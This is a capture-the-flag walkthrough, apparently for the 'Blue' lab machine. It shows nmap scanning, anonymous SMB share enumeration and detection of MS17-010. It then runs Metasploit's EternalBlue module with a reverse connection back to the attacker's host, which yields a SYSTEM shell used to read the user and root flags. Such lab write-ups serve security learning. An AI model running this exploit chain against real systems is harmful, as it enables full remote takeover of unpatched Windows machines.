As usual let's start with nmap
nmap -sV -sC 10.129.238.166
nmap tells us that port 445 is open which is SMB so let's use this command to list the shares available:
smbclient -L 10.129.238.166
Note: SMB authentication always require a username. If you don't specify one, it will use your VM username as default. When prompted to enter a password, just press enter.
We have a few shares to look into. When prompted for a password just press enter.
smbclient \\\\10.129.238.166\\ADMIN$
smbclient \\\\10.129.238.166\\C$
We can't access ADMIN$ and C$
Let's keep going with the other shares:
smbclient \\\\10.129.238.166\\IPC$
smbclient \\\\10.129.238.166\\Share
smbclient \\\\10.129.238.166\\Users
We were able to access these 3 last shares but couldn't find anything interesting there.
Now let's do another nmap but this time looking for vulnerabilities in port 445 specifically by using this command:
nmap -p 445 --script vuln 10.129.238.166
-p ----> to specify a specific port (here port 445)
--script vuln ----> These scripts are looking for specific known vulnerabilities on the target machine
ok so we have a vulnerability called smb-vuln-ms17-010 Let's google it!
We found that ms17-010 is actually associated with the Eternal Blue vulnerability!
That explains why the target machine name is Blue!
We find the following :
"EternalBlue is an exploit that allows cyber threat actors to remotely execute arbitrary code and gain access to a network by sending specially crafted packets. It exploits a software vulnerability in Microsoft’s Windows operating systems (OS) Server Message Block (SMB) version 1 (SMBv1) protocol, a network file sharing protocol that allows access to files on a remote server. This exploit potentially allows cyber threat actors to compromise the entire network and all devices connected to it. Due to EternalBlue’s ability to compromise networks, if one device is infected by malware via EternalBlue, every device connected to the network is at risk. This makes recovery difficult, as all devices on a network may have to be taken offline for remediation. This vulnerability was patched and is listed on Microsoft’s security bulletin as MS17-010."
Now let's look for an exploit.
Let's open Metasploit:
msfconsole
Once Metasploit has opened, let's search for any exploit that contains the word blue by typing:
search blue
Let's check number 13 called exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/ms17_010_eternalblue
show options
Looks like we only need to set RHOSTS (remote host) and LHOST (local host). RPORT is already set to 445 by default and LPORT is already set to 4444 by default.
set RHOSTS 10.129.238.166
Type the IP of the target machine
set LHOST 10.10.14.10
Type the IP of your local machine (if you don't know your IP, open a new prompt and type ifconfig)
Now that it's all set up, let's run the exploit:
exploit
It worked!
Now we can type:
shell
Let's find out the level of privileges we got:
whoami
ok we are nt authority\system so we have unrestricted privileges on the machine.
Let's change directory to find out the users
cd C:\Users
And now let's list the folders in this directory by typing:
dir
Looks like one of the user is haris. The user flag is usually located on the Desktop of the user so let's do:
cd haris/Desktop
then
dir
type user.txt
Congratulations! You got the user flag!
Now let's go get the root flag. The root flag is usually located at C:\Users\Administrator\Desktop so :
cd C:\Users\Administrator\Desktop
dir
type root.txt
Congratulations! You got the root flag!
Comments